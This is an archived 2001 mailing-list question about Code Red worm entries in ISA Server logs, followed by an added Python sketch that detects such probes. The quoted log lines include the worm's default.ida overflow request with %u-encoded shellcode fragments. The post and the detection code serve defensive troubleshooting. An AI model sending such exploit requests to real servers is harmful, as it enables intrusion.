ISA Server Code Red Log entries

  • From: Nicholas Palmer <NICK@xxxxxxxxxxx>
  • To: "'isalist@xxxxxxxxxxxxx'" <isalist@xxxxxxxxxxxxx>
  • Date: Mon, 6 Aug 2001 12:32:39 -0700

I've been following the messages here on the latest code red worm and I've
seen several of the entries in my log files (WEBEX.....LOG)

WARNING : Log entries with dangerous links : 


61.221.240.50   anonymous       -       2001-08-04      14:56:07
GATEWAY -       www.worm.com <www.worm.com>     -       -       2323    4039
-       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a  -       12202

And ...

24.1.178.131    anonymous       -       2001-08-04      15:09:34
GATEWAY -       209.151.234.200 168.65.50.21    12345   1933    3818    171
http    GET
http://168.65.50.21:12345/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX      Inet    200


My understanding of the first one is that the 12202 at the end means that
ISA blocked it.  But it's the other entry, with the Inet 200 at the end, that
I'm concerned about.  Doesn't 200 mean that it was successful?  I've applied
the patches from MS faithfully, and when I try the Coderedchecker program I
come out OK.  Our IIS Server is on ISA server and I am publishing it with a
destination set that uses the IP address of the external NIC, which I read
below could cause a problem.  Will this cause me any problems?

Thanks
Nick.

KCI Computing, Inc.
(nick@xxxxxxxxxxx)
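
A triage sketch for entries like the two quoted above, added here as an example and not part of the original post: it re-joins wrapped log records, finds default.ida requests padded with a long run of one character, and reports each one's final field. The sample lines are constructed, and the field layout, the 32-character threshold and the reading of the last field as the result code (12202 as denied, following the post) are assumptions.

```python
import re

# Constructed sample in the layout of the entries quoted above: documentation
# IPs, shortened filler, records wrapped across lines. Not real log lines.
SAMPLE_LOG = "\n".join([
    "192.0.2.10\tanonymous\t-\t2001-08-04\t14:56:07",
    "GATEWAY\t-\twww.example.test\t-\t-\t2323\t4039\t-\t-\tGET",
    "http://www.example.test/default.ida?" + "N" * 40,
    "N" * 40 + "%u9090%u6858=a\t-\t12202",
    "198.51.100.7\tanonymous\t-\t2001-08-04\t15:09:34",
    "GATEWAY\t-\t203.0.113.5\t203.0.113.9\t12345\t1933\t3818\t171\thttp\tGET",
    "http://203.0.113.9:12345/default.ida?" + "X" * 40,
    "X" * 40 + "\tInet\t200",
    "198.51.100.8\tanonymous\t-\t2001-08-04\t15:10:02",
    "GATEWAY\t-\t203.0.113.5\t203.0.113.9\t80\t15\t300\t200\thttp\tGET\thttp://203.0.113.9/index.html\tInet\t200",
])

# A record starts on a line that opens with client IP, user, agent, date.
RECORD_START = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}\s+\S+\s+\S+\s+\d{4}-\d{2}-\d{2}\s")
# default.ida? followed by one character repeated; 32 is an assumed threshold.
PROBE = re.compile(r"default\.ida\?((.)\2{31,})", re.IGNORECASE)
DENIED = "12202"  # the code the post reads as "ISA blocked it"

def records(text):
    """Re-join wrapped lines into one string per log record."""
    current = []
    for line in text.splitlines():
        if RECORD_START.match(line) and current:
            yield "\n".join(current)
            current = []
        if line.strip():
            current.append(line)
    if current:
        yield "\n".join(current)

def find_probes(text):
    """Return (client_ip, filler_char, filler_len, result_code) per probe."""
    hits = []
    for rec in records(text):
        flat = re.sub(r"\s+", "", rec)  # undo wrapping inside the URL
        m = PROBE.search(flat)
        if m:
            fields = rec.split()
            hits.append((fields[0], m.group(2), len(m.group(1)), fields[-1]))
    return hits

def needs_review(text):
    """Probes whose result code is anything other than the denial code."""
    return [h for h in find_probes(text) if h[3] != DENIED]
```

A result of 200 on such a request only shows that a response was returned, so the entries from needs_review() are the ones to check against the published server's patch state.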


